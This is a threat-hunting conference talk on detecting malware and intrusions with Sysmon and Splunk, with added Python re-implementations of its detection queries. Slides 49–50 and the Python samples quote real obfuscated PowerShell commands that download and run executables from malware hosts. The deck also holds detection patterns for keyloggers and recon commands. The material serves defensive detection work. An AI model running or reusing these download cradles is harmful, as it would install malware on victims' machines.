
Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk)
Tom Ueltschi, Swiss Post CERT
FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE
Slide 1: C:\> whoami


Slide 45: Advanced Detection (Adwind RAT)
- JBifrost RAT
- Alert: alert_sysmon_java-malware-infection
  index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode="1" (Users AppData Roaming (javaw.exe OR xcopy.exe)) OR (cmd cscript vbs)
  | search Image="*\\AppData\\Roaming\\Oracle\\bin\\java*.exe*" OR (Image="*\\xcopy.exe*" CommandLine="*\\AppData\\Roaming\\Oracle\\*") OR CommandLine="*cscript*Retrive*.vbs*"

Slide 46: Detecting Keyloggers
- Keyloggers and password stealers abusing NirSoft tools: Limitless Logger, Predator Pain, HawkEye Keylogger, iSpy Keylogger, KeyBase Keylogger
- CommandLine: <PATH-TO-EXE>\*.exe /stext <PATH-TO-TXT>\*.txt
- CommandLine: <PATH-TO-EXE>\*.exe /scomma ...
  index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode="1" (stext OR scomma)
  | search CommandLine="* /stext *" OR CommandLine="* /scomma *"

Slide 47: Detecting Keyloggers
- BONUS: detecting a new banking trojan variant (Heodo/Emotet)
- Link in email to download JS from a web server (DHL__Report__*.js)
- Executing the JS downloads an EXE from a web server
- The EXE uses the «/scomma» parameter (YARA: NirSoft strings in memory)

Slide 48: Detecting Keyloggers
- BONUS: detecting a new banking trojan variant (Heodo/Emotet) (screenshot)

Slide 49: Malicious PowerShell
  index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode="1" (powershell.exe OR cmd.exe)
  | eval CommandLine2=replace(CommandLine,"[ '+\"\^]","")
  | search (Image="*\\powershell.exe" OR Image="*\\cmd.exe") CommandLine2="*WebClient*" CommandLine2="*DownloadFile*"
- Sample CommandLine:
  "C:\Windows\System32\cmd.exe" /c powershell -command (("New-Object Net.WebClient")).("'Do'+'wnloadfile'").invoke('http://unofficialhr.top/tv/homecooking/tenderloin.php','C:\Users\***\AppData\Local\Temp\spasite.exe'); & "C:\Users\***\AppData\Local\Temp\spasite.exe"
- Remove all obfuscation chars; resulting CommandLine2:
  C:\Windows\System32\cmd.exe/cpowershell-command((New-ObjectNet.WebClient)).(Downloadfile).invoke(http://unofficialhr.top/tv/homecooking/tenderloin.php,C:\Users\purpural\AppData\Local\Temp\spasite.exe);&C:\Users\purpural\AppData\Local\Temp\spasite.exe
- De-obfuscate simple obfuscation techniques
- Are all (obfuscation) problems solved?

Slide 50: Malicious PowerShell
- LNK with PowerShell command, embedded in a DOCX file (oleObject.bin):
  cmd.exe /c powershell -c $eba = ('exe'); $sad = ('wnloa'); ((New-Object Net.WebClient)).('Do' + $sad + 'dfile').invoke('http://golub.histosol.ch/bluewin/mail/inbox.php' 'C:\Users\*****\AppData\Local\Temp\doc.' + $eba); start('C:\Users\*****\AppData\Local\Temp\doc.' + $eba)
- «De-obfuscated»:
  powershell-c$eba=(exe);$sad=(wnloa);((New-ObjectNet.WebClient)).(Do$saddfile).invoke(http://golub.histosol.ch/bluewin/mail/inbox.phpC:\Users\*****\AppData\Local\Temp\doc.$eba);start(C:\Users\*****\AppData\Local\Temp\doc.$eba)
- The query doesn't match: «DownloadFile» never appears in CommandLine2, because part of the string lives in the variable $sad
- Sample from 2016-11-18:
  d8af6037842458f7789aa6b30d6daefb  Abrechnung # 5616147.docx
  2b9c71fe5f121ea8234aca801c3bb0d9  Beleg Nr. 892234-32.lnk
- Strings from oleObject.bin:
  E:\TEMP\G\18.11.16\ch1\golub\Beleg Nr. 892234-32.lnk
  C:\Users\azaz\AppData\Local\Temp\Beleg Nr. 892234-32.lnk
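The de-obfuscation step from slides 49 and 50, as an added example that is not part of the original slides: a Python re-implementation of the replace() eval and the WebClient/DownloadFile match, run over command lines adapted from the two slides (constructed samples; usernames masked as on the slides, a comma added between the invoke() arguments). It goes one step beyond the slide's query with a resolve_variables() helper that inlines single-quoted string variables such as $sad, which is exactly what the slide-50 sample needs to match; that helper, and its limit to literal single-quoted assignments, is my assumption, not the talk's.

```python
import re

# The slide's eval: replace(CommandLine, "[ '+\"\^]", "")
# i.e. drop space, single quote, plus, double quote and caret.
OBFUSCATION_CHARS = re.compile(r"""[ '+"^]""")

# Simple PowerShell string-variable assignment, e.g.  $sad = ('wnloa');
# Resolving these goes beyond the slide's query and is an assumption of this
# example: only single-quoted literal assignments are handled.
VAR_ASSIGN = re.compile(r"\$(\w+)\s*=\s*\(?\s*'([^']*)'\s*\)?\s*;")


def normalize(cmdline: str) -> str:
    """Mirror the SPL eval: strip the characters used for quote/concat obfuscation."""
    return OBFUSCATION_CHARS.sub("", cmdline)


def resolve_variables(cmdline: str) -> str:
    """Inline single-quoted string variables into their later uses (extension, not in the slide)."""
    out = cmdline
    for name, value in VAR_ASSIGN.findall(cmdline):
        out = re.sub(r"\$" + re.escape(name) + r"\b",
                     lambda _m, v=value: "'" + v + "'", out)
    return out


def is_download_cradle(cmdline: str) -> bool:
    """Equivalent of  CommandLine2="*WebClient*" CommandLine2="*DownloadFile*"  (Splunk matches case-insensitively)."""
    normalized = normalize(cmdline).lower()
    return "webclient" in normalized and "downloadfile" in normalized


def scan(events, resolve=False):
    """Return the labels of events whose command line matches; resolve=True enables variable inlining."""
    hits = []
    for label, cmdline in events:
        candidate = resolve_variables(cmdline) if resolve else cmdline
        if is_download_cradle(candidate):
            hits.append(label)
    return hits


# Constructed samples adapted from slides 49 and 50 (usernames masked as on the slides).
SAMPLE_CONCAT = r'''"C:\Windows\System32\cmd.exe" /c powershell -command (("New-Object Net.WebClient")).("'Do'+'wnloadfile'").invoke('http://unofficialhr.top/tv/homecooking/tenderloin.php','C:\Users\***\AppData\Local\Temp\spasite.exe'); & "C:\Users\***\AppData\Local\Temp\spasite.exe"'''
SAMPLE_VARIABLE = r'''cmd.exe /c powershell -c $eba = ('exe'); $sad = ('wnloa'); ((New-Object Net.WebClient)).('Do' + $sad + 'dfile').invoke('http://golub.histosol.ch/bluewin/mail/inbox.php', 'C:\Users\*****\AppData\Local\Temp\doc.' + $eba); start('C:\Users\*****\AppData\Local\Temp\doc.' + $eba)'''
SAMPLE_BENIGN = r'''powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"'''

EVENTS = [("concat", SAMPLE_CONCAT), ("variable", SAMPLE_VARIABLE), ("benign", SAMPLE_BENIGN)]

if __name__ == "__main__":
    print("slide query  :", scan(EVENTS))                # ['concat']  -- the slide-50 case is missed
    print("with resolve :", scan(EVENTS, resolve=True))  # ['concat', 'variable']
```

The first call reproduces the slide's result: the concatenation sample is caught, the variable sample is not. The second call shows one cheap way to close that particular gap; it does nothing for other tricks (format strings, encoded commands), which is the point of the slide's closing question.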

Slide 51: Processes connecting thru Proxy
  index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode=1
    [ search index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode=3 Image="*\\Users\\*" DestinationHostname="proxy.fqdn"
      | stats by ComputerName ProcessGuid | fields ComputerName ProcessGuid ]
  | fields Hashes ComputerName Image ParentImage
  | rex field=Hashes ".*MD5=(?<MD5>[A-F0-9]*),IMPHASH=(?<IMPHASH>[A-F0-9]*)"
  | rex field=Image ".*\\\\Users\\\\(?<username>[^\\\\]+)\\\\.*"
  | rex field=Image ".*\\\\+(?<proc_name>[^\\\\]+\.[eE][xX][eE]).*"
  | rex field=ParentImage ".*\\\\+(?<pproc_name>[^\\\\]+\.[eE][xX][eE]).*"
  | stats dc(ComputerName) AS CLIENTS, dc(MD5) AS CNT_MD5, dc(Image) AS CNT_IMAGE, values(username) AS Users, values(ComputerName) AS Computers, values(MD5) AS MD5, values(proc_name) AS proc_name, values(pproc_name) AS pproc_name by IMPHASH
  | where CLIENTS < 15
  | sort -CLIENTS
- IMPHASH = Import Hash
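The proxy-connection hunt from slide 51, as an added example that is not part of the original slides: the same two-stage logic (subsearch over EventCode 3 for user-profile binaries reaching the proxy, then EventCode 1 joined on ComputerName/ProcessGuid and aggregated by IMPHASH with a client-count ceiling) written in Python over constructed Sysmon event dicts. Hash values, hostnames, GUIDs and the proxy name proxy.fqdn are constructed or taken from the slide; the assumed Hashes layout is Sysmon's with HashAlgorithms=MD5,IMPHASH, as the slide's rex implies.

```python
import re
from collections import defaultdict

# Mirrors the slide's rex on the Hashes field (Sysmon configured with HashAlgorithms=MD5,IMPHASH).
HASHES_RE = re.compile(r"MD5=(?P<MD5>[A-F0-9]*),IMPHASH=(?P<IMPHASH>[A-F0-9]*)")
USERNAME_RE = re.compile(r"\\Users\\([^\\]+)\\")


def parse_hashes(hashes):
    m = HASHES_RE.search(hashes)
    return (m.group("MD5"), m.group("IMPHASH")) if m else (None, None)


def proc_name(image):
    return image.rsplit("\\", 1)[-1]


def rare_proxy_processes(events, proxy_host="proxy.fqdn", max_clients=15):
    """IMPHASH-level summary of user-profile binaries that talk to the proxy on fewer than max_clients hosts."""
    # Subsearch: ProcessGuids of binaries under \Users\ that connected to the proxy (EventCode 3).
    keys = {(e["ComputerName"], e["ProcessGuid"]) for e in events
            if e["EventCode"] == 3 and e.get("DestinationHostname") == proxy_host
            and "\\Users\\" in e.get("Image", "")}
    # Outer search: the matching process-create events (EventCode 1), aggregated by IMPHASH.
    agg = defaultdict(lambda: {"clients": set(), "md5": set(), "images": set(),
                               "users": set(), "proc_name": set(), "pproc_name": set()})
    for e in events:
        if e["EventCode"] != 1 or (e["ComputerName"], e["ProcessGuid"]) not in keys:
            continue
        md5, imphash = parse_hashes(e["Hashes"])
        if not imphash:
            continue
        a = agg[imphash]
        a["clients"].add(e["ComputerName"])
        a["md5"].add(md5)
        a["images"].add(e["Image"])
        um = USERNAME_RE.search(e["Image"])
        if um:
            a["users"].add(um.group(1))
        a["proc_name"].add(proc_name(e["Image"]))
        a["pproc_name"].add(proc_name(e["ParentImage"]))
    rows = []
    for imphash, a in agg.items():
        clients = len(a["clients"])
        if clients < max_clients:  # where CLIENTS < 15
            rows.append({"IMPHASH": imphash, "CLIENTS": clients, "CNT_MD5": len(a["md5"]),
                         "CNT_IMAGE": len(a["images"]), "Users": sorted(a["users"]),
                         "Computers": sorted(a["clients"]), "MD5": sorted(a["md5"]),
                         "proc_name": sorted(a["proc_name"]), "pproc_name": sorted(a["pproc_name"])})
    rows.sort(key=lambda r: r["CLIENTS"], reverse=True)  # sort -CLIENTS
    return rows


# --- constructed sample events -------------------------------------------------
def _proc(host, guid, image, parent, md5, imphash):
    return {"EventCode": 1, "ComputerName": host, "ProcessGuid": guid, "Image": image,
            "ParentImage": parent, "Hashes": f"MD5={md5},IMPHASH={imphash}"}


def _net(host, guid, image, dest):
    return {"EventCode": 3, "ComputerName": host, "ProcessGuid": guid,
            "Image": image, "DestinationHostname": dest}


EVENTS = []
# 20 workstations running the same widely deployed per-user browser build: excluded by CLIENTS < 15.
for i in range(20):
    host, guid = f"WS{i:02d}", f"{{guid-browser-{i}}}"
    image = rf"C:\Users\user{i}\AppData\Local\Browser\browser.exe"
    EVENTS.append(_proc(host, guid, image, r"C:\Windows\explorer.exe", "A" * 32, "B" * 32))
    EVENTS.append(_net(host, guid, image, "proxy.fqdn"))
# One workstation with an unknown binary in AppData\Roaming using the proxy: reported.
EVENTS.append(_proc("WS42", "{guid-odd}", r"C:\Users\jdoe\AppData\Roaming\update.exe",
                    r"C:\Users\jdoe\AppData\Local\Temp\doc.exe", "C" * 32, "D" * 32))
EVENTS.append(_net("WS42", "{guid-odd}", r"C:\Users\jdoe\AppData\Roaming\update.exe", "proxy.fqdn"))
# A system binary using the proxy: Image is not under \Users\, so the subsearch ignores it.
EVENTS.append(_proc("WS42", "{guid-sys}", r"C:\Windows\System32\svchost.exe",
                    r"C:\Windows\System32\services.exe", "E" * 32, "F" * 32))
EVENTS.append(_net("WS42", "{guid-sys}", r"C:\Windows\System32\svchost.exe", "proxy.fqdn"))

if __name__ == "__main__":
    for row in rare_proxy_processes(EVENTS):
        print(row["CLIENTS"], row["IMPHASH"], row["proc_name"], row["pproc_name"], row["Users"])
```

Grouping by IMPHASH rather than MD5 is what makes the rarity count useful: recompiled or repacked builds of the same tool keep their import table, so CNT_MD5 > 1 under one IMPHASH with a small CLIENTS value is exactly the row worth opening first.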

Slide 52: SMB traffic between WS
  index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode=3 Initiated=true SourceIp!=DestinationIp DestinationPort=445 Image!=System (SourceHostname="WS*" DestinationHostname="WS*") OR (SourceIp="10.10.*.*" DestinationIp="10.10.*.*")
  | stats by ComputerName ProcessGuid | fields ComputerName ProcessGuid
- Search for network connections
- SMB protocol (dst port 445)
- Source and destination are workstations (hostname or IP)
- Use «ProcessGuid» to correlate with other event types (proc's)
- Search for legitimate SMB servers (filers, NAS)
- Create a «whitelist» to exclude them as legitimate destinations

Slide 53: Lateral Movement (admin shares)
- Alert: CS_Lateral_Movement_psexec
  10/18/2016 11:17:12 PM
  LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=1 EventType=4 Type=Information
  Message=Process Create:
    Image: \\127.0.0.1\ADMIN$\8c0cb58.exe
    CommandLine: \\127.0.0.1\ADMIN$\8c0cb58.exe
    CurrentDirectory: C:\Windows\system32\
    User: NT AUTHORITY\SYSTEM
    IntegrityLevel: System
    ParentImage: C:\Windows\system32\services.exe
    ParentCommandLine: C:\Windows\System32\services.exe
- Search for admin share names in image paths

Slide 54: Lateral Movement (admin shares)
- Alert: CS_Lateral_Movement_psexec
  10/18/2016 11:17:13 PM
  LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=1 EventType=4 Type=Information
  Message=Process Create:
    Image: C:\Windows\SysWOW64\rundll32.exe
    CommandLine: C:\Windows\System32\rundll32.exe
    CurrentDirectory: C:\Windows\system32\
    User: NT AUTHORITY\SYSTEM
    IntegrityLevel: System
    ParentImage: \\127.0.0.1\ADMIN$\8c0cb58.exe
    ParentCommandLine: \\127.0.0.1\ADMIN$\8c0cb58.exe
- Search for admin share names in image paths (here in the parent image)

Slide 55: Lateral Movement (proc injection)
- Alert: CS_Lateral_Movement_psexec
  10/18/2016 11:17:13 PM
  LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=8 EventType=4 Type=Information
  Message=CreateRemoteThread detected:
    SourceProcessId: 29340
    SourceImage: \\127.0.0.1\ADMIN$\8c0cb58.exe
    TargetProcessId: 18476
    TargetImage: C:\Windows\SysWOW64\rundll32.exe
    NewThreadId: 20060
    StartAddress: 0x0000000000110000
    StartFunction:
- Search for the rarest source or target images from proc injection

Slide 56: Keylogger (proc injection)
- Alert: CS_Keylogger_injection
  10/26/2016 11:56:32 PM
  LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=8 EventType=4 Type=Information
  Message=CreateRemoteThread detected:
    SourceProcessId: 17728
    SourceImage: C:\Windows\SysWOW64\rundll32.exe
    TargetProcessId: 836
    TargetImage: C:\Windows\System32\winlogon.exe
    NewThreadId: 14236
    StartAddress: 0x0000000000C20000
    StartFunction:
- Suspicious proc injection into «winlogon.exe»
- Steals the user's password while logging on or unlocking the screensaver
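The three hunts on slides 53 to 56 (admin share names in image paths, rarest source/target image pairs in CreateRemoteThread events, injection into winlogon.exe) share one need: pulling fields out of the Sysmon Message block. The added example below is not part of the original slides; it parses the "Key: Value" message layout shown on the slides and runs the three checks over the four messages from the slides plus two constructed records (a benign notepad.exe start and a repeated, constructed agent.exe to explorer.exe injection pair to give the rarity count something to rank against). The admin-share regex and the SENSITIVE_TARGETS set are my assumptions.

```python
import re
from collections import Counter

# UNC path into an administrative share, e.g. \\127.0.0.1\ADMIN$\x.exe or "\\host\C$\x.exe" (assumed pattern).
ADMIN_SHARE_RE = re.compile(r'^"?\\\\[^\\]+\\(?:ADMIN\$|[A-Za-z]\$)\\', re.IGNORECASE)
PATH_FIELDS = ("Image", "CommandLine", "ParentImage", "ParentCommandLine")
SENSITIVE_TARGETS = {"winlogon.exe"}  # from slide 56; extend for your environment


def parse_message(message):
    """Parse a Sysmon Message block: first line is the event type, the rest are 'Key: Value' lines."""
    lines = [ln.strip() for ln in message.strip().splitlines() if ln.strip()]
    fields = {"_type": lines[0].rstrip(":")}
    for ln in lines[1:]:
        key, _, value = ln.partition(":")  # first colon ends the key; paths keep their own colons
        fields[key.strip()] = value.strip()
    return fields


def basename(path):
    return path.strip('"').rstrip("\\").rsplit("\\", 1)[-1].lower()


def admin_share_fields(fields):
    """Path fields that point into an admin share (slides 53/54)."""
    return [f for f in PATH_FIELDS if f in fields and ADMIN_SHARE_RE.match(fields[f])]


def injection_rarity(events):
    """Count (SourceImage, TargetImage) pairs over EventCode 8 and return them rarest first (slide 55)."""
    pairs = Counter()
    for ev in events:
        if ev["EventCode"] == 8:
            f = parse_message(ev["Message"])
            pairs[(basename(f["SourceImage"]), basename(f["TargetImage"]))] += 1
    return sorted(pairs.items(), key=lambda kv: (kv[1], kv[0]))


def sensitive_injections(events):
    """EventCode 8 events whose target is a sensitive process such as winlogon.exe (slide 56)."""
    hits = []
    for ev in events:
        if ev["EventCode"] == 8:
            f = parse_message(ev["Message"])
            if basename(f["TargetImage"]) in SENSITIVE_TARGETS:
                hits.append((ev["ComputerName"], f["SourceImage"], f["TargetImage"], f.get("StartAddress", "")))
    return hits


# Messages from slides 53-56 (CurrentDirectory/User lines omitted for brevity) plus constructed records.
MSG_53 = r"""Process Create:
Image: \\127.0.0.1\ADMIN$\8c0cb58.exe
CommandLine: \\127.0.0.1\ADMIN$\8c0cb58.exe
ParentImage: C:\Windows\system32\services.exe
ParentCommandLine: C:\Windows\System32\services.exe"""
MSG_54 = r"""Process Create:
Image: C:\Windows\SysWOW64\rundll32.exe
CommandLine: C:\Windows\System32\rundll32.exe
ParentImage: \\127.0.0.1\ADMIN$\8c0cb58.exe
ParentCommandLine: \\127.0.0.1\ADMIN$\8c0cb58.exe"""
MSG_55 = r"""CreateRemoteThread detected:
SourceProcessId: 29340
SourceImage: \\127.0.0.1\ADMIN$\8c0cb58.exe
TargetProcessId: 18476
TargetImage: C:\Windows\SysWOW64\rundll32.exe
NewThreadId: 20060
StartAddress: 0x0000000000110000
StartFunction:"""
MSG_56 = r"""CreateRemoteThread detected:
SourceProcessId: 17728
SourceImage: C:\Windows\SysWOW64\rundll32.exe
TargetProcessId: 836
TargetImage: C:\Windows\System32\winlogon.exe
NewThreadId: 14236
StartAddress: 0x0000000000C20000
StartFunction:"""
MSG_BENIGN = r"""Process Create:
Image: C:\Windows\System32\notepad.exe
CommandLine: "C:\Windows\System32\notepad.exe" C:\Users\jdoe\notes.txt
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: C:\Windows\Explorer.EXE"""
MSG_NOISE = r"""CreateRemoteThread detected:
SourceImage: C:\Program Files\Vendor\agent.exe
TargetImage: C:\Windows\explorer.exe
StartAddress: 0x0000000000A00000"""

EVENTS = [
    {"EventCode": 1, "ComputerName": "WS01", "Message": MSG_53},
    {"EventCode": 1, "ComputerName": "WS01", "Message": MSG_54},
    {"EventCode": 8, "ComputerName": "WS01", "Message": MSG_55},
    {"EventCode": 8, "ComputerName": "WS02", "Message": MSG_56},
    {"EventCode": 1, "ComputerName": "WS03", "Message": MSG_BENIGN},
    {"EventCode": 8, "ComputerName": "WS03", "Message": MSG_NOISE},
    {"EventCode": 8, "ComputerName": "WS04", "Message": MSG_NOISE},
]
```

Call admin_share_fields(parse_message(m)) on each EventCode 1 message, injection_rarity(EVENTS) for the ranked pair list and sensitive_injections(EVENTS) for the winlogon.exe hit; StartAddress is kept in the output because, as on slide 56, an address with no StartFunction symbol is part of what makes the event worth a look.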


Slide 58: Hunting for Delivery of Malware
- Malicious files downloaded via browser
- Sysmon «FileCreateStreamHash» events are generated
- Remember the malicious JS files from email links? (Heodo/Emotet)

Slide 59: Hunting for Delivery of Malware
- Remember that JS filename from before?
- Let's hunt for that ... (DHL__Report__*.js)

Slides 60-64: Hunting for Delivery of Malware (screenshots only)

Slide 65: Hunting for Delivery of Malware (NEW)
- Email link clicked, doc file downloaded

Slide 66: Hunting for Delivery of Malware (NEW)
- Doc file opened

Slide 67: Hunting for Delivery of Malware (NEW)
- Word doc macro enabled

Slide 68: Detecting Persistence Methods
- Hunting for persistence methods
  - Registry keys
  - Filesystem (e.g. Startup folders)

Slide 69: Detecting Persistence (Registry)
- Searching for «Run» or «RunOnce» keys

Slides 70-71: Detecting Persistence (Registry) (screenshots only)

Slide 72: Detecting Persistence (Filesystem)
- Example for «ProcessCreate», not «FileCreate»

Slide 73: Detecting Persistence (Filesystem)
- This should make you go «Hmmm??»

Slide 74: Detecting Persistence (Filesystem)
- Example for «FileCreate»
- Fewer than 400 results in more than 2 months, after tuning the exclusion list

Slides 75-76: Detecting Persistence (Filesystem) (screenshots only)

Slide 77: Detecting Internal Recon
- Internal recon is used as preparation for lateral movement
- Legitimate system commands are used
- The same commands can also be used by sysadmins or users
- Baseline and find appropriate thresholds
  - Number of different commands and time window

Slides 78-82: Detecting Internal Recon (screenshots only)

Slide 83: Detecting Internal Recon
- 3 or more (of 7) different commands executed within 15 min

Slide 84: Detecting Internal Recon
- 15 occurrences, 6 different commands within 15 minutes

Slide 85: Detecting Internal Recon
- «False detections» are possible: Explorer -> cmd.exe, 3 different commands within 3 minutes
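The threshold rule from slides 77 to 85 (3 or more of 7 different discovery commands within 15 minutes, evaluated per host), as an added example that is not part of the original slides. The slides give the count of commands but not the list, so the seven names in RECON_CMDS are my assumption; the events, hostnames and timestamps are constructed. The sliding window keeps, per host, the 15-minute window with the most distinct commands, so the output also carries the parent images needed to triage the slide-85 false-positive pattern (an interactive cmd.exe under Explorer).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed set of seven discovery commands; the slide states the count (7) but not the list.
RECON_CMDS = {"whoami.exe", "net.exe", "net1.exe", "ipconfig.exe",
              "nltest.exe", "systeminfo.exe", "tasklist.exe"}


def parse_utc(s):
    """Sysmon UtcTime format, e.g. 2018-05-01 10:00:00.000"""
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect_recon(events, threshold=3, window=timedelta(minutes=15)):
    """One alert per host whose densest `window` holds >= threshold distinct recon commands."""
    by_host = defaultdict(list)
    for e in events:
        if e["EventCode"] == 1 and basename(e["Image"]) in RECON_CMDS:
            by_host[e["ComputerName"]].append(
                (parse_utc(e["UtcTime"]), basename(e["Image"]), basename(e["ParentImage"])))
    alerts = []
    for host, evs in by_host.items():
        evs.sort()
        best = []
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:  # slide the window's left edge
                start += 1
            current = evs[start:end + 1]
            if len({c for _, c, _ in current}) > len({c for _, c, _ in best}):
                best = current
        cmds = sorted({c for _, c, _ in best})
        if len(cmds) >= threshold:
            alerts.append({"host": host, "commands": cmds, "count": len(best),
                           "span_min": (best[-1][0] - best[0][0]).total_seconds() / 60,
                           "parents": sorted({p for _, _, p in best})})
    return sorted(alerts, key=lambda a: a["host"])


# --- constructed Sysmon EventCode 1 records ------------------------------------
def _ev(host, utc, image, parent):
    return {"EventCode": 1, "ComputerName": host, "UtcTime": utc, "Image": image, "ParentImage": parent}


S32 = r"C:\Windows\System32"
CMD = S32 + r"\cmd.exe"
EVENTS = [
    # WS01: four different commands inside 12 minutes -> alert
    _ev("WS01", "2018-05-01 10:00:00.000", S32 + r"\whoami.exe", CMD),
    _ev("WS01", "2018-05-01 10:04:30.000", S32 + r"\net.exe", CMD),
    _ev("WS01", "2018-05-01 10:09:10.000", S32 + r"\nltest.exe", CMD),
    _ev("WS01", "2018-05-01 10:12:00.000", S32 + r"\ipconfig.exe", CMD),
    # WS02: repeats and slow pace, never 3 distinct commands inside 15 minutes -> no alert
    _ev("WS02", "2018-05-01 09:00:00.000", S32 + r"\ipconfig.exe", CMD),
    _ev("WS02", "2018-05-01 09:20:00.000", S32 + r"\ipconfig.exe", CMD),
    _ev("WS02", "2018-05-01 09:50:00.000", S32 + r"\whoami.exe", CMD),
    _ev("WS02", "2018-05-01 10:00:00.000", S32 + r"\net.exe", CMD),
    # WS03: hands-on use of an interactive shell, 3 commands in 3 minutes -> alert (possible false detection)
    _ev("WS03", "2018-05-01 14:00:00.000", S32 + r"\whoami.exe", CMD),
    _ev("WS03", "2018-05-01 14:01:00.000", S32 + r"\systeminfo.exe", CMD),
    _ev("WS03", "2018-05-01 14:03:00.000", S32 + r"\tasklist.exe", CMD),
    # Not a recon command: ignored
    _ev("WS02", "2018-05-01 10:01:00.000", S32 + r"\notepad.exe", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for a in detect_recon(EVENTS):
        print(a["host"], a["commands"], f'{a["span_min"]:.1f} min', a["parents"])
```

Raising the threshold or shrinking the window changes which hosts fire, which is the baselining exercise slide 77 asks for; the test below shows both knobs.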

Slide 86: Lateral Movement
- Lateral movement using WMI for execution

Slide 87: ATT&CK TTP on WMI (screenshot)

Slide 88: Who's (ab-)using WMI (screenshot)

Slides 89-93: Who's (ab-)using WMI (screenshots only)

Slide 94: Testing with WMImplant
- Testing «command_exec» using WMImplant with PS-ISE

Slide 95: Testing with WMImplant
- Testing «process_start» using WMImplant with Beacon

Slides 96-97: Detecting WMI spawned proc's (screenshots only)

Slide 98: Detecting WMI spawned proc's
- Searching for child-process creations of «wmiprvse.exe»
- Filtering out «known good» processes
- Don't filter out «Powershell.exe» in general
- Combine with «CommandLine» params

Slide 99: Detecting WMI spawned proc's
- Command executions («powershell *$env:*» and IEX, obfuscation)
- Processes started (calc.exe, notepad.exe ...)

Slide 100: Detecting WMI spawned proc's
- Also detects the CS Beacon WMI lateral movement method
- «powershell.exe ... -encodedcommand ...»
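The wmiprvse.exe child-process logic of slides 98 to 100, as an added example that is not part of the original slides: children of wmiprvse.exe are kept unless they are on a known-good list, PowerShell is never dropped wholesale, and the command line is scored for the markers the slides name ($env:, IEX, obfuscation characters, -encodedcommand and its abbreviations). The known-good entry (inventoryagent.exe), the hostnames and every command line are constructed; the regexes are my heuristics, not the talk's queries.

```python
import re

# Constructed placeholder for an environment's baseline of legitimate wmiprvse.exe children.
KNOWN_GOOD_CHILDREN = {"inventoryagent.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Command-line markers from slides 99/100 (heuristic regexes, assumed by this example).
SUSPICIOUS_CMDLINE = [
    ("env_var",        re.compile(r"\$env:", re.I)),                               # powershell *$env:*
    ("iex",            re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("encodedcommand", re.compile(r"(?<![\w-])-e(ncodedcommand|nc|c)?\b", re.I)),   # -encodedcommand, -enc, -ec, -e
    ("obfuscation",    re.compile(r"""['"+^]{2,}""")),                              # runs of quote/concat/caret chars
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify_wmi_child(event):
    """(severity, reasons) for an EventCode 1 child of wmiprvse.exe worth a look, else None."""
    if event["EventCode"] != 1 or basename(event["ParentImage"]) != "wmiprvse.exe":
        return None
    child = basename(event["Image"])
    if child in KNOWN_GOOD_CHILDREN:
        return None
    reasons = [name for name, rx in SUSPICIOUS_CMDLINE if rx.search(event["CommandLine"])]
    if child in INTERPRETERS:
        # Never filtered out; the command line decides how loud the alert is.
        return ("high", reasons) if reasons else ("medium", ["interpreter spawned by WMI"])
    return ("medium", ["unusual process spawned by WMI"] + reasons)


def wmi_spawned_alerts(events):
    out = []
    for e in events:
        verdict = classify_wmi_child(e)
        if verdict:
            out.append((e["ComputerName"], basename(e["Image"]), verdict[0], verdict[1]))
    return out


# --- constructed Sysmon EventCode 1 records ------------------------------------
WMI = r"C:\Windows\System32\wbem\WmiPrvSE.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def _ev(host, parent, image, cmdline):
    return {"EventCode": 1, "ComputerName": host, "ParentImage": parent, "Image": image, "CommandLine": cmdline}


EVENTS = [
    # slide 100 pattern: encoded command launched through WMI (payload replaced by a placeholder)
    _ev("WS01", WMI, PS, "powershell.exe -NoP -NonI -W Hidden -EncodedCommand <BASE64-PLACEHOLDER>"),
    # slide 99 pattern: command execution reading back through $env: with IEX
    _ev("WS02", WMI, PS, r'powershell.exe -c "iex (gc $env:TEMP\out.txt)"'),
    # slide 99 pattern: plain process start via WMI
    _ev("WS03", WMI, r"C:\Windows\System32\calc.exe", "calc.exe"),
    # known-good child: filtered
    _ev("WS04", WMI, r"C:\Program Files\Inventory\inventoryagent.exe", "inventoryagent.exe /scan"),
    # PowerShell, but not a WMI child: out of scope for this rule
    _ev("WS05", r"C:\Windows\explorer.exe", PS, "powershell.exe -NoProfile"),
    # PowerShell under WMI with an unremarkable command line: kept at medium, not dropped
    _ev("WS06", WMI, PS, r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\collect.ps1"),
]

if __name__ == "__main__":
    for host, child, severity, reasons in wmi_spawned_alerts(EVENTS):
        print(host, child, severity, reasons)
```

The medium-severity rows are the ones slide 98 warns against filtering: a scheduled collection script and an interactive WMImplant session look identical at the parent/child level, and only the command line and the host's baseline separate them.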
